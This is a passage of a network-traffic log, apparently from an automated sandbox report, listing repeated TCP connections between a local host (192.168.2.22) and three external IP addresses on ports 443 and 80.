          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
